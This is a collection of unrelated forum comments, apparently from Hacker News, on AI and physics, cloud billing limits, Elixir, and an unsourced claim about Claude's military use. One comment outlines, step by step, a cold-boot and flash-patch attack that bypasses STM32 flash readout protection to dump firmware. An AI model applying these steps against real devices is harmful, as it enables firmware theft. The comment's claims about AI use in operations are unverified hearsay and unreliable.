The issue to my mind is a lack of data at the meeting of QFT/GR.
Afterall few humans historically have been capable of the initial true leap between ontologies. But humans are pretty smart so we can't say that is a requirement for AGI.
“The laws of nature should be expressed in beautiful equations.”
- Paul Dirac
“It is, indeed, an incredible fact that what the human mind, at its deepest and most profound, perceives as beautiful finds its realisation in external nature. What is intelligible is also beautiful. We may well ask: how does it happen that beauty in the exact sciences becomes recognizable even before it is understood in detail and before it can be rationally demonstrated? In what does this power of illumination consist?”
- Subrahmanyan Chandrasekhar
“I often follow Plato’s strategy, proposing objects of mathematical beauty as models for Nature.”
“It was beauty and symmetry that guided Maxwell and his followers.”
- Frank Wilczek
“Beauty, is bound up with symmetry.”
- Herman Weyl
"Still twice in the history of exact natural science has this shining-up of the great interconnection become the decisive signal for significant progress. I am thinking here of two events in the physics of our century: the rise of the theory of relativity and that of the quantum theory. In both cases, after yearlong unsuccessful striving for understanding, a bewildering abundance of details was almost suddenly ordered. This took place when an interconnection emerged which, thought largely unvisualizable, was finally simple in its substance. It convinced through its compactness and abstract beauty – it convinced all those who can understand and speak such an abstract language."
- Werner Heisenberg
Maybe (just maybe) these things (whatever you want to call them) will (somehow) gain access to some "compact", beautiful, "largely unvisualizable" "interconnection" which will be the self-evident solution. And if they do, many will be sure to label it a statistical accident from a stochastic parrot. And they'll right, for some definitions of "statistical", "accident", "stochastic", and "parrot".
I think a very long time because part of our limit is experiment.
We need enough experimental results to explain to solve these theoretical mismatches and we don't and at present can't explore that frontier.
Once we have more results at that frontier we'd build a theory out from there that has two nearly independent limits for QFT and GR.
What we'd be asking if the AI is something that we can't expect a human to solve even with a lifetime of effort today.
It'll take something in par with Newton realising that the heavens and apples are under the same rules to do it. But at least Newton got to hold the apple and only had to imagine he could a star.
> I think a very long time because part of our limit is experiment.
Yes, maybe. But if you are smarter, you can think up better experiments that you can actually do. Or re-use data from earlier experiments in novel and clever ways.
What prevents us from giving this system access to other real systems that live in physical labs? I don't see much difference between parameterizing and executing a particle accelerator run and invoking some SQL against a provider. It's just JSON on the wire at some level.
In 1900 Henri Poincaré wrote that radiation (light) has an effective mass given by E/c^2.
So it really isn't far fetched. What intrigues me more is if it was capable of it would our Victorian conservative minded scientists have RLHF it out of that kind of thing?
The problem for me is that the reason this is needed is that kids are permanently online, completely unprepared for the wild west that is the internet and increasingly effectively raised by the internet.
All this is to facilitate that lifestyle without any concerns that far more damage is likely to happen by allowing it to happen than insisting on adequate parenting
I use regular Firefox with the option to delete all data on quit. And I quit maybe once per day or so, as soon as I feel there are too many tabs open. Serves the same purpose.
It is worth noting that both products have had "student" tiers or similar, that had fixed credit limits with a cliff.
Therefore, they've implemented hard-limits. So not offering hard-limits is a business decision, NOT a technical one. They're essentially hiding functionality they have.
Make of that as you will. Anyone justifying it, should be me with skepticism.
Soft limits would be ideal (x/day with maximum peak of x/minute), but hey, that's literally negative value to them (work to code, CPU time to implement, less income out of "mistakes")
I've heard that Google keeps Google Drive data around for up to two years if your subscription expired and your account is over quota. They could certainly do the same with other cloud storage.
If I reduce my gdrive subscription they don’t simply delete what I have over the new (lower) limit. There is a grace period and it’s standard practice. Why should it be any different in this case?
There is, and it would cause an outage while still not achieving the supposed goal of not going over budget. You don't want to be killing your customer's production over potential misconfigurations/forgotten budgets. Especially when you'd continue to bill them for the storage and other static things like IPs.
It's so much easier for them to have support wave accidental overuses.
It's probably to keep the payload in SRAM for longer.
If it's the attack I believe it to be, basically it:
1. Acts as a debugger (core blocks touching flash) and writes a 2-part payload to SRAM.
2. Detaches the debugger, straps the boot pins to boot from SRAM (payload 1)
3. Resets the board via reset pin (keeping SRAM)
4. SRAM payload 1 runs (core blocks touching flash), configuring the FPB to 'overlay' the reset vector on flash with a pointer to payload 2
5. Flicks off the power just long enough for the hardware to reset, but not long enough for the SRAM to clear (this is where I think being cold helps).
6. Device boots 'unlocked' into 'flash', but the FPB hijacked the vector table and so the CPU immediately jumps to payload 2.
7. Payload 2 can now do whatever with flash (e.g. dump it out over UART or SPI)
Freezing RAM keeps its contents intact for remarkable amounts of time. For DRAM it's long enough to unplug the DIMM from the target device and move it across to the analysis device for recovery of the data on it. It's one of those things that's hard to believe until you actually do it, that you can have the RAM totally disconnected and unpowered while it retains its contents.
Speaking of cooling STM chips, I noticed a while ago, much to my annoyance, that the STM32C0 chips started to do really strange things below -20C even though they're rated to -40C. Luckily the pin compatible STM32G0 chips worked correctly down to -40C, so I could finish the project and ship the product.
It seems like the news is also coming out that Claude was used in planning the Venezuela and Iran operations[0].
Whatever you thoughts on legality or justification, both have been staggering effective in initial goals.
Interms of intel and complex operation planning.
Despite Trump ragging on Anthropic just hours before it was still considered necessary for the operation.
Quite telling. I don't think Pentagon will be satisfied with just Grok and ChatGPT. Which means OpenAI might really be done for in terms of having no moat beyond least ethics (Grok does that anyways).
I love the idea of Erlang (and by association Elixir), OTP, BEAM...
In practice? Urgh.
The live is all so cerebral and theoretical and I'm certain the right people know how to implement it for the right tasks in the right way and it screams along.
But as yet no one has been able to give me an incling of how it would work well for me.
I read learn you some Erlang for great good quite a while back and loved the idea. But it just never comes together for me in practice. Perhaps I'm simply in the wrong domain for it.
What I really needed was a mentor and existing project to contribute to at work. But it's impossible to get hold of either in the areas I'm in.
I personally really really enjoy writing Elixir. It is a really intuitive way to write programs. Phoenix is a great web framework, and I think all of it is quite approachable. We just had a go programmer start at our org recently and they were contributing to one of our Phoenix bases SaaS apps within weeks
Once it gets big enough in your location you buy it for that sweet sweet intel.
reply